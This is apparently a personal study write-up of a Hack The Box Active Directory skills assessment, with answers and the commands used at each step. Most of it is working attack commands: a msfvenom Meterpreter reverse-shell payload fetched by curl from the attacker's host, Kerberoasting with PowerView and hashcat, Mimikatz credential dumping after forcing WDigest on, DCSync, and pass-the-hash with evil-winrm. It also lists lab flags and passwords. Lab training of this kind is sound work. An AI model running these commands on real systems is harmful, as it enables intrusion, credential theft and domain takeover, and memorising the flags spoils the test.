FaresMorcy
  • Whoami
  • Footprinting Labs
    • Lab - Easy
    • Lab - Medium
    • Lab - Hard
  • Shells & Payloads
    • The Live Engagement
  • Password Attacks
    • Lab - Easy
    • Lab - Medium
    • Lab - Hard
  • Active Directory Enumeration & Attacks
    • Active Directory Enumeration & Attacks
    • AD Enumeration & Attacks - Skills Assessment Part I
    • AD Enumeration & Attacks - Skills Assessment Part II
  • SOC Hackthebox Notes & Labs
    • Security Monitoring & SIEM Fundamentals Module
    • Windows Event Logs & Finding Evil Module
    • Introduction to Threat Hunting & Hunting With Elastic Module
    • Understanding Log Sources & Investigating with Splunk Module
      • Introduction To Splunk & SPL
      • Using Splunk Applications
      • Intrusion Detection With Splunk (Real-world Scenario)
      • Detecting Attacker Behavior With Splunk Based On TTPs
      • Detecting Attacker Behavior With Splunk Based On Analytics
      • Skills Assessment
    • Windows Attacks & Defense
      • Kerberoasting
      • AS-REProasting
      • GPP Passwords
      • GPO Permissions/GPO Files
      • Credentials in Shares
      • Credentials in Object Properties
      • DCSync
      • Golden Ticket
      • Kerberos Constrained Delegation
      • Print Spooler & NTLM Relaying
      • Coercing Attacks & Unconstrained Delegation
      • Object ACLs
      • PKI - ESC1
      • Skills Assessment
    • Intro to Network Traffic Analysis Module
    • YARA & Sigma for SOC Analysts Module
      • Developing YARA Rules
      • Hunting Evil with YARA (Windows Edition)
      • Hunting Evil with YARA (Linux Edition)
      • Sigma and Sigma Rules
      • Developing Sigma Rules
      • Hunting Evil with Sigma (Chainsaw Edition)
      • Hunting Evil with Sigma (Splunk Edition)
      • Skills Assessment
  • TryHackme SOC 1
    • TShark
      • TShark: The Basics
      • TShark: CLI Wireshark Features
      • TShark Challenge I: Teamwork
      • TShark Challenge II: Directory
    • Tempest
    • Boogeyman 1
    • Boogeyman 2
    • Boogeyman 3
  • TryHackme SOC 2
    • Advanced Splunk
      • Splunk: Exploring SPL
      • Splunk: Setting up a SOC Lab
      • Splunk: Dashboards and Reports
      • Splunk: Data Manipulation
      • Fixit
    • Advanced ELK
      • Slingshot
    • Threat Hunting
      • Threat Hunting: Foothold
      • Threat Hunting: Pivoting
      • Threat Hunting: Endgame
  • TryHackme Rooms
    • Investigating Windows
    • Splunk 2
    • Windows Network Analysis
  • Powershell Scripting Fundamentals
  • SANS SEC504 & Labs
    • Book one
      • Live Examination
      • Network Investigations
      • Memory Investigations
      • Malware Investigations
      • Accelerating IR with Generative AI
      • Bootcamp: Linux Olympics
      • Bootcamp: Powershell Olympics
    • Book Two
      • Hacker Tools and Techniques Introduction
      • Target Discovery and Enumeration
      • Discovery and Scanning with Nmap
      • Cloud Spotlight: Cloud Scanning
      • SMB Security
      • Defense Spotlight: Hayabusa and Sigma Rules
    • Book Three
      • Password Attacks
      • Cloud Spotlight: Microsoft 365 Password Attacks
      • Understanding Password Hashes
      • Password Cracking
      • Cloud Spotlight: Insecure Storage
      • Multipurpose Netcat
    • Book Four
      • Metasploit Framework
      • Drive-By Attacks
      • Command Injection
      • Cross-Site Scripting
      • SQL Injection
      • Cloud Spotlight: SSRF and IMDS
    • Book Five
      • Endpoint Security Bypass
      • Pivoting and Lateral Movement
      • Hijacking Attacks
      • Establishing Persistence
      • Defense Spotlight: RITA
      • Cloud Spotlight: Cloud Post-Exploitation
  • SANS SEC511 & Labs
    • Resources
      • Primers
      • References
      • Tools
        • Network
        • Elastic Stack
      • Printable Versions
    • Book One
      • Part One
      • Part Two
      • Part Three
    • Book Two
      • Part One
      • Part Two
      • Part Three
      • Part Four
    • Book Three
      • Part One
      • Part Two
      • Part Three
      • Part Four
    • Book Four
      • Part One
      • Part Two
      • Part Three Lab
      • Part Four Lab
    • Book Five
      • Part One Lab
      • Part Two Lab
      • Part Three Lab
  • CyberDefenders
    • XXE Infiltration Lab
    • T1594 Lab
    • RetailBreach Lab
    • DanaBot Lab
    • OpenWire Lab
    • BlueSky Ransomware Lab
    • Openfire Lab
    • Boss Of The SOC v1 Lab
    • GoldenSpray Lab
    • REvil Lab
    • ShadowRoast Lab
    • SolarDisruption Lab
    • Kerberoasted Lab
    • T1197 Lab
    • Amadey Lab
    • Malware Traffic Analysis 1 Lab
    • Insider Lab
    • Volatility Traces Lab
    • FalconEye Lab
    • GitTheGate Lab
    • Trident Lab
    • NerisBot Lab
  • Practical Windows Forensics
    • Data Collection
    • Examination
    • Disk Analysis Introduction
    • User Behavior
    • Overview of disk structures, partitions and file systems
    • Finding Evidence of Deleted Files with USN Journal Analysis
    • Analyzing Evidence of Program Execution
    • Finding Evidence of Persistence Mechanisms
    • Uncover Malicious Activity with Windows Event Log Analysis
    • Windows Memory Forensic Analysis
  • Hackthebox Rooms
    • Campfire-1
    • Compromised
    • Brutus
    • Trent
    • CrownJewel-1
  • WEInnovate Training
    • Weinnovate - Active Directory Task One
    • Build ELK Lab
      • Configure Elasticsearch and Kibana setup in ubuntu
      • Configure Fluent-Bit to send logs to ELK
      • Set up Winlogbeat & Filebeat for log collection
      • Send Logs from Winlogbeat through Logstash to ELK
      • Enable Windows Audit Policy & Winlogbeat
      • Elasticsearch API and Ingestion Pipeline
    • SOAR
      • Send Alerts To Email & Telegram Bot
      • Integrate Tines with ELK
    • SOC Practical Assessment
    • Lumma C2
    • Network Analysis
  • Build ELK Lab
    • Configure Elasticsearch and Kibana setup in ubuntu
    • Configure Fluent-Bit to send logs to ELK
    • Set up Winlogbeat & Filebeat for log collection
    • Send Logs from Winlogbeat through Logstash to ELK
    • Enable Windows Audit Policy & Winlogbeat
    • Elasticsearch API and Ingestion Pipeline
  • Build Home Lab - SOC Automation
    • Install & configure Sysmon for deep Windows event logging
    • Set up Wazuh & TheHive for threat detection & case management
    • Execute Mimikatz & create detection rules in Wazuh
    • Automate everything with Shuffle
    • Response to SSH Attack Using Shuffle, Wazuh, and TheHive
  • Home Lab (Attack & Defense Scenarios)
    • Pass-the-Hash Attack & Defense
    • Scheduled Task Attack & Defense
    • Kerberoasting Attack & Defense
    • Kerberos Constrained Delegation
    • Password Spraying Attack & Defense
    • Golden Ticket Attack & Defense
    • AS-REProasting Attack & Defense
    • DCSync Attack & Defense
  • Home Lab (FIN7 (Carbanak Group) – Point of Sale (POS) Attack on Hospitality Chains)
  • Home Lab (Lumma Stealer)
Powered by GitBook
On this page
  1. Active Directory Enumeration & Attacks

AD Enumeration & Attacks - Skills Assessment Part I

PreviousActive Directory Enumeration & AttacksNextAD Enumeration & Attacks - Skills Assessment Part II

Last updated 8 days ago

Scenario:

A team member started an External Penetration Test and was moved to another urgent project before they could finish. The team member was able to find and exploit a file upload vulnerability after performing recon of the externally-facing web server. Before switching projects, our teammate left a password-protected web shell (with the credentials: admin:My_W3bsH3ll_P@ssw0rd!) in place for us to start from in the /uploads directory. As part of this assessment, our client, Inlanefreight, has authorized us to see how far we can take our foothold and is interested to see what types of high-risk issues exist within the AD environment. Leverage the web shell to gain an initial foothold in the internal network. Enumerate the Active Directory environment looking for flaws and misconfigurations to move laterally and ultimately achieve domain compromise.

Let's navigate to http://ip/uploads and log in using the credentials provided above.

Answer: JusT_g3tt1ng_st@rt3d!

Q2) Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer

To operate more efficiently from our attack machine, we need to establish a reverse shell. Let's generate a reverse shell payload and start the listener.

First, let's identify the system type of the victim machine.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.45 LPORT=4444 -f exe -o payload.exe

Next, let's initiate our listener using Metasploit.

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.15.45
set LPORT 4444
exploit

Let's also start an HTTP server to host the payload, allowing it to be downloaded onto the victim machine.

python3 -m http.server

It is now time to download the payload onto the target machine and execute it.

curl http://10.10.15.45:8000/payload.exe -O C:\Windows\System32\payload.exe

Now that we have obtained a reverse shell, we need to use setspn to query all Service Principal Names (SPNs) registered within the domain.

setspn -Q */*

Answer: svc_sql

Q3) Crack the account's password. Submit the cleartext value.

Let's download PowerView on the Windows system to perform a Kerberoasting attack and extract the service ticket hash for the svc_sql user.

Get-DomainUser -Identity svc_sql | Get-DomainSPNTicket -Format Hashcat
hashcat -m 13100 svcsql_tgs /usr/share/wordlists/rockyou.txt

Answer: lucky7

Q4) Submit the contents of the flag.txt file on the Administrator desktop on MS01

net use \\MS01\c$ /user:INLANEFREIGHT.LOCAL\svc_sql lucky7
type \\ms01\c$\Users\Administrator\Desktop\flag.txt

Answer: spn$r0ast1ng_on@n_0p3n_f1re

Q5) Find cleartext credentials for another domain user. Submit the username as your answer.

Next, we need to connect to MS01.INLANEFREIGHT.LOCAL using the credentials we previously obtained. Since we do not have direct access to this machine, we will first set up a port forwarding rule to enable RDP access from our attacker machine.

Here is the IP address of the MS01 computer, which will be used as the connection IP address.

netsh.exe interface portproxy add v4tov4 listenport=8888 listenaddress=10.129.253.79 connectport=3389 connectaddress=172.16.6.50

Let's initiate a connection using RDP.

xfreerdp /u:svc_sql /p:lucky7 /v:10.129.253.79:8888 /dynamic-resolution /drive:Shared,//home/htb-ac-1224655/

I used the drive option to ensure convenient access to our tools.

Now, let's use Mimikatz to retrieve the cleartext password.

.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

I found a blank password here, which indicates that WDigest needs to be enabled. WDigest is a Windows authentication protocol that stores user credentials in plaintext within memory, making them accessible to tools like Mimikatz for extraction.

Answer: tpetty

Q6) Submit this user's cleartext password.

After this we will need to restart the computer

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
shutdown.exe /r /t 0 /f

Now that we’ve logged in again, let’s repeat the same steps we performed using Mimikatz and review the results.

Answer: Sup3rS3cur3D0m@inU2eR

Q7) What attack can this user perform?

Let's enumerate the user's access control list to determine their permissions and capabilities.

Import-Module .\PowerView.ps1
$sid = Convert-NameToSid tpetty
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}

Answer: DCSync

Q8) Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01

We will now use Mimikatz to perform a DCSync attack to retrieve the hash of the Administrator account. Before proceeding, we need to run the command as the user tpetty.

runas /user:INLANEFREIGHT\tpetty powershell.exe
privilege::debug
lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator

We have obtained the administrator's hash, which can be used directly for authentication. However, before proceeding, we need to verify which ports are open on the domain controller at 172.16.6.3.

run autoroute -s 172.16.6.3
run autoroute -p

It instructs Metasploit to route traffic destined for the 172.16.6.3 subnet through the currently compromised host via the Meterpreter session.

Next, let's conduct a port scan to identify the open ports.

use auxiliary/scanner/portscan/tcp
set rhosts 172.16.6.3
exploit

I discovered that port 5985 is open, which is the default port for WinRM over HTTP. However, before connecting from our attacking machine, we need to set up port forwarding.

portfwd add -l 6666 -p 5985 -r 172.16.6.3

Next, we will use Evil-WinRM from the attacking machine to establish a connection to the domain controller using the provided credentials.

evil-winrm -i 10.10.15.16 --port 6666 -u administrator -H 27dedb1dab4d8545c6e1c66fba077da0

Answer: r3plicat1on_m@st3r!